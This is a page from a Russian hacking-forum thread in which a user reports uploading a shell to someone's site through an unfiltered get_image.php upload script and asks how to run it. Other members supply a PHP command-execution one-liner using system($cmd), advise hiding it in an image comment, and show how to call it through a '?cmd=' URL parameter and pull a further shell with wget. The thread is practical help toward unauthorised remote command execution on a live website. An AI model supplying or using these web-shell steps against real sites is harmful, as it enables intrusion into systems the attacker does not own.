ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Зальем файлы на сайт через get_image.php
   
Ответ
Страница 1 из 3 1 2 3 >
 
Опции темы Поиск в этой теме Опции просмотра

Зальем файлы на сайт через get_image.php
  #1  
Старый 07.05.2006, 23:07
Аватар для djhoof
djhoof
Новичок
Регистрация: 07.05.2006
Сообщений: 28
Провел на форуме:
66452

Репутация: 1
Talking Зальем файлы на сайт через get_image.php
На сайте.. стоит get_image.php скриптик, который должен служить для заливки на сайт картинок.
Но он, также пропускает и все другие файлы..такие как php, html, и все остальное короче..

Залил я туда shell, но там пишут, что "Для выполнения оно должно иметь права 0755 ли 0711"
Хотя файлы с другим разрешением открываются.

Все файлы появляются в папке /www.site.ru/img/

Какие есть варианты?
 
Ответить с цитированием

  #2  
Старый 07.05.2006, 23:49
Аватар для djhoof
djhoof
Новичок
Регистрация: 07.05.2006
Сообщений: 28
Провел на форуме:
66452

Репутация: 1
По умолчанию
залил.
После нажати я на кнопку добавить как и обычно вылелтел адресок куда все зелетело.
Выдалось http://..ru/img/1147031229.jpg
Нажимаю ничего не происходит..хотя через Ie он выдает текст shella
Что мне с ним делать?
Последний раз редактировалось djhoof; 08.05.2006 в 00:02..
 
Ответить с цитированием

  #3  
Старый 08.05.2006, 00:20
Аватар для djhoof
djhoof
Новичок
Регистрация: 07.05.2006
Сообщений: 28
Провел на форуме:
66452

Репутация: 1
По умолчанию
Вот по хорошему его как нить залить в другую папку..через этот get_image.php
Какие мысли еще, народ?
 
Ответить с цитированием

  #4  
Старый 08.05.2006, 00:32
Аватар для djhoof
djhoof
Новичок
Регистрация: 07.05.2006
Сообщений: 28
Провел на форуме:
66452

Репутация: 1
По умолчанию
Если нужно то могу этот исходничек get_image.php осветить.
 
Ответить с цитированием

  #5  
Старый 08.05.2006, 03:03
Аватар для alex-19841
alex-19841
Познающий
Регистрация: 31.03.2006
Сообщений: 58
Провел на форуме:
163249

Репутация: 1
По умолчанию
Попробуй
http://site.ru/index.php?cmd="php shell.jpg"
 
Ответить с цитированием

  #6  
Старый 08.05.2006, 11:54
Аватар для djhoof
djhoof
Новичок
Регистрация: 07.05.2006
Сообщений: 28
Провел на форуме:
66452

Репутация: 1
По умолчанию
Люди тут еще советуют:
Можно попробывать залить вот такую команду
<? system($cmd);?>
И потом через неё залить шелл другой который тебе нужен!
Может и не работать но попробуй!
Или добавить <? system($cmd); ?> в коментарий картинки авось выполниться!

А можно поподробнее, на счет залит эту команду..да и вообще сам процес что-то не пойму..
 
Ответить с цитированием

  #7  
Старый 08.05.2006, 12:40
Аватар для KaMiKadZe
KaMiKadZe
Участник форума
Регистрация: 24.02.2006
Сообщений: 206
Провел на форуме:
2735257

Репутация: 103
По умолчанию
Цитата:
Сообщение от djhoof  
Люди тут еще советуют:
Можно попробывать залить вот такую команду
<? system($cmd);?>
И потом через неё залить шелл другой который тебе нужен!
Может и не работать но попробуй!
Или добавить <? system($cmd); ?> в коментарий картинки авось выполниться!

А можно поподробнее, на счет залит эту команду..да и вообще сам процес что-то не пойму..
Это я предлогал но моё сообщение пропало куда то(
Вообщем команды там будут типа http://site.ru/img/fail.php?cmd= и тут команда типа uname -a воть а залить моно так ls -la
 
Ответить с цитированием

  #8  
Старый 08.05.2006, 13:02
Аватар для Zitt
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100

Репутация: 773


Отправить сообщение для Zitt с помощью ICQ
По умолчанию
Цитата:
а залить моно так ls -la
Ета команда показывает файлы в дире. А залить попробуй через "wget сцылка" но ето тока в том случае если есть права на запись
 
Ответить с цитированием

  #9  
Старый 08.05.2006, 13:11
Аватар для djhoof
djhoof
Новичок
Регистрация: 07.05.2006
Сообщений: 28
Провел на форуме:
66452

Репутация: 1
По умолчанию
К сожалению или к счастью у меня нет огромного опыта в этих делах..дабы поэтому и спрашивал.
Можно мне написать подробно на счет fail.php?cmd=...(так как пока мне не покажешь..черт побери я так и не пойму..)
Заранее благодарен.
Я хотел бы научится, да вот только не знаю что да где..
 
Ответить с цитированием

  #10  
Старый 08.05.2006, 13:31
Аватар для Zitt
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100

Репутация: 773


Отправить сообщение для Zitt с помощью ICQ
По умолчанию
djhoof статей по етомe поводу уйма почитай немного!!!
Цитата:
Можно мне написать подробно на счет fail.php?cmd=...
Куда уж подробней заливаеш пхп файл с ети <? system($cmd); ?> сожержимым допустим тот же fall.php. Дальше http://site.ru/img/fail.php?cmd=команда
 
Ответить с цитированием
Ответ
Страница 1 из 3 1 2 3 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взломать весь сайт через отдельный поддомен Monah IRH PHP, PERL, MySQL, JavaScript 2 01.02.2006 03:10
Как зайти на сайт через его ип Майор Болталка 11 29.03.2005 23:15
Взлом сервера Microsoft IIS 6 Через SQL Запросы [Tsh] *CorPSe* АнтиАдмин 3 08.03.2005 12:16
Сайт SCO [www.sco.com] деликатно взломали ФРАЙ Мировые новости 0 01.12.2004 00:27
Пытаюсь поламать сайт через пароль Thief Болталка 25 26.08.2004 22:14



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ